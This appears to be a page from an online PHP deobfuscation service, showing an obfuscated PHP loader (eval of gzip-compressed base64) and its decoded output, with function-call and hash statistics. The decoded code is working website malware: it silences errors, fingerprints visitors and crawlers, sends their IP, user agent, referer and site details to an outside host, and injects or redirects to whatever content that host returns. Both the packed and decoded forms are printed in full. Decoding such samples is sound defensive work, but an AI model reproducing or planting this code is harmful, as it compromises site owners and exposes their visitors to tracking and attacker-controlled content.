Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?ob_start();$a='eNrtWG1z2jgQ/n6/wmUyBU/dhLdAermkYYjTMkdDSqC5uQzjEUYBNcZybRGgTf77rWzLlm0My..

Decoded Output download

ob_end_clean();?><?php
 @ini_set('display_errors', 0); @error_reporting(0); $api_id = ']['; $api_key_host = '2CkoLgZqCI4sTnOWvds0wF'; $api_url = 'http://rowoft.top/user/27617e2341bb52f89b31daa6773b2d362415056460174bb4/?api='; $api_em_referer = 0; $api_em_useragent = 1; $api_ipv6 = 1; $api_rd_bots = 1; $api_rotator = 1; $api_n_cookies = 'qwerty'; $api_t_cookies = 3600; $api_connect = 1; $api_timeout_connect = 10; $api_status = 1; if($api_status == 1){ $api_out = ''; $api_lang = ''; $api_country = ''; $api_city = ''; $api_device = ''; $api_operator = ''; $api_bot = ''; $api_uniq = ''; $api_empty = '-'; $api_bot = $api_empty; $api_api_data = ''; if(!empty($_SERVER['HTTP_USER_AGENT'])){ $api_useragent = $_SERVER['HTTP_USER_AGENT']; } else{ if($api_em_useragent == 1){ $api_bot = 'others'; } $api_useragent = $api_empty; } if(!empty($_SERVER['HTTP_REFERER'])){ $api_referer = $_SERVER['HTTP_REFERER']; $api_ref = $api_referer; if(stristr($api_referer, 'google')){$api_se = 'google';} if(stristr($api_referer, 'yandex')){$api_se = 'yandex';} if(stristr($api_referer, 'mail.ru')){$api_se = 'mail';} if(stristr($api_referer, 'yahoo')){$api_se = 'yahoo';} if(stristr($api_referer, 'bing')){$api_se = 'bing';} if(empty($api_se)){$api_se = $api_empty;} } else{ if($api_em_referer == 1){ $api_bot = 'others'; } $api_referer = $api_empty; $api_ref = ''; $api_se = $api_empty; } if(stristr($api_useragent, 'baidu')){$api_bot = 'baidu';} if(stristr($api_useragent, 'bing') || stristr($api_useragent, 'msnbot')){$api_bot = 'bing';} if(stristr($api_useragent, 'google')){$api_bot = 'google';} if(stristr($api_useragent, 'mail.ru')){$api_bot = 'mail';} if(stristr($api_useragent, 'yahoo')){$api_bot = 'yahoo';} if(stristr($api_useragent, 'yandex')){$api_bot = 'yandex';} if($api_bot == $api_empty){ $signature = 'bot,spider,crawler,copier,aport,rambler,nigma,ask,ia_archiver,crowsnest,peerindex,slurp,ning,js-kit,twiceler,java,commentreader,yeti,btwebclient,ezooms,teleport,offline,disco,netvampire,httrack'; $ex = explode(",", $signature); $x = 0; while(!empty($ex[$x])){ if(stristr($api_useragent, $ex[$x])){ $api_bot = 'others'; break; } $x++; } } if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR']){ if(strpos($_SERVER['HTTP_X_FORWARDED_FOR'],".")>0 && strpos($_SERVER['HTTP_X_FORWARDED_FOR'],",")>0){ $api_ip = explode(",",$_SERVER['HTTP_X_FORWARDED_FOR']); $api_ipuser = trim($api_ip[0]); } elseif(strpos($_SERVER['HTTP_X_FORWARDED_FOR'],".")>0 && strpos($_SERVER['HTTP_X_FORWARDED_FOR'],",")===false){ $api_ipuser = trim($_SERVER['HTTP_X_FORWARDED_FOR']); } } if(!isset($api_ipuser)){ $api_ipuser = trim($_SERVER['REMOTE_ADDR']); } if(!filter_var($api_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) && !filter_var($api_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)){ $api_ipuser = $api_empty; } if($api_ipv6 == 1 && filter_var($api_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)){ $api_bot = 'others'; } if(($api_bot == $api_empty || $api_rd_bots == 1) && $api_ipuser != $api_empty){ $api_lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); if(empty($api_lang)){$api_lang = $api_empty;} $api_domain = $_SERVER['HTTP_HOST']; $api_page_url = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if($api_rotator == 1){ if(!isset($_COOKIE[$api_n_cookies])){ SetCookie($api_n_cookies, 0, time() + $api_t_cookies, '/'); $api_c_counter = 0; $api_uniq = 'yes'; } else{ $api_c_counter = $_COOKIE[$api_n_cookies] + 1; SetCookie($api_n_cookies, $api_c_counter, time() + $api_t_cookies, '/'); $api_uniq = 'no'; } } else{ $api_uniq = 'yes'; } $api_data = array( "api_key_host"=>$api_key_host, "id"=>$api_id, "ipuser"=>$api_ipuser, "lang"=>$api_lang, "referer"=>$api_referer, "useragent"=>$api_useragent, "uniq"=>$api_uniq, "domain"=>$api_domain, "se"=>$api_se, "key"=>@urlencode($api_key), "macro_1"=>@urlencode($api_parameter_1), "macro_2"=>@urlencode($api_parameter_2), "macro_3"=>@urlencode($api_parameter_3), "macro_4"=>@urlencode($api_parameter_4), "macro_5"=>@urlencode($api_parameter_5), "macro_6"=>@urlencode($api_parameter_6), "macro_7"=>@urlencode($api_parameter_7), "macro_8"=>@urlencode($api_parameter_8), "macro_9"=>@urlencode($api_parameter_9), "macro_10"=>@urlencode($api_parameter_10) ); $api_data = $api_url.base64_encode(serialize($api_data)); if($api_connect == 0){ $api_api_data = @file_get_contents($api_data); } else{ $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, $api_timeout_connect); curl_setopt($ch, CURLOPT_URL, $api_data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); $api_api_data = curl_exec($ch); } $api_api_data_tmp = @unserialize($api_api_data); if(is_array($api_api_data_tmp)){ $api_out = trim(html_entity_decode($api_api_data_tmp[0], ENT_QUOTES, 'UTF-8')); $api_lang = $api_api_data_tmp[1]; $api_country = $api_api_data_tmp[2]; $api_city = $api_api_data_tmp[3]; $api_device = $api_api_data_tmp[4]; $api_operator = $api_api_data_tmp[5]; $api_bot = $api_api_data_tmp[6]; $api_uniq = $api_api_data_tmp[7]; if(stristr($api_out, '|||') && $api_rotator == 1){ $api_out_ex = explode('|||', $api_out); if(isset($api_out_ex[$api_c_counter])){ $api_test = trim($api_out_ex[$api_c_counter]); } if(!empty($api_test)){ $api_out = trim($api_out_ex[$api_c_counter]); } else{ $api_out = trim($api_out_ex[0]); SetCookie($api_n_cookies, 0, time() + $api_t_cookies, '/'); $api_c_counter = 0; } } else{ if(stristr($api_out, '|||')){ $api_out_ex = explode('|||', $api_out); $api_out = trim($api_out_ex[0]); } } } else{ $api_out = trim(html_entity_decode($api_api_data, ENT_QUOTES, 'UTF-8')); if(stristr($api_out, '|||') && $api_rotator == 1){ $api_out_ex = explode('|||', $api_out); if(isset($api_out_ex[$api_c_counter])){ $api_test = trim($api_out_ex[$api_c_counter]); } if(!empty($api_test)){ $api_out = trim($api_out_ex[$api_c_counter]); } else{ $api_out = trim($api_out_ex[0]); SetCookie($api_n_cookies, 0, time() + $api_t_cookies, '/'); $api_c_counter = 0; } } else{ if(stristr($api_out, '|||')){ $api_out_ex = explode('|||', $api_out); $api_out = trim($api_out_ex[0]); } } } } if(stristr($api_out, '[RAWURLENCODE_REFERER]')){ $api_out = str_ireplace('[RAWURLENCODE_REFERER]', rawurlencode($api_ref), $api_out); } if(stristr($api_out, '[URLENCODE_REFERER]')){ $api_out = str_ireplace('[URLENCODE_REFERER]', urlencode($api_ref), $api_out); } if(stristr($api_out, '[RAWURLENCODE_PAGE_URL]')){ $api_out = str_ireplace('[RAWURLENCODE_PAGE_URL]', rawurlencode($api_page_url), $api_out); } if(stristr($api_out, '[URLENCODE_PAGE_URL]')){ $api_out = str_ireplace('[URLENCODE_PAGE_URL]', urlencode($api_page_url), $api_out); } } ?>

Did this file decode correctly?

Original Code

<?ob_start();$a='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';eval(gzuncompress(base64_decode($a)));$v=ob_get_contents();ob_end_clean();?>

Function Calls

ob_start	1
gzuncompress	1
ob_end_clean	1
base64_decode	1
ob_get_contents	1

Variables

$a	eNrtWG1z2jgQ/n6/wmUyBU/dhLdAermkYYjTMkdDSqC5uQzjEUYBNcZybRGg..
$v

Stats

MD5	df4ed8bfcf53c80c55f45812014a72dd
Eval Count	1
Decode Time	88 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats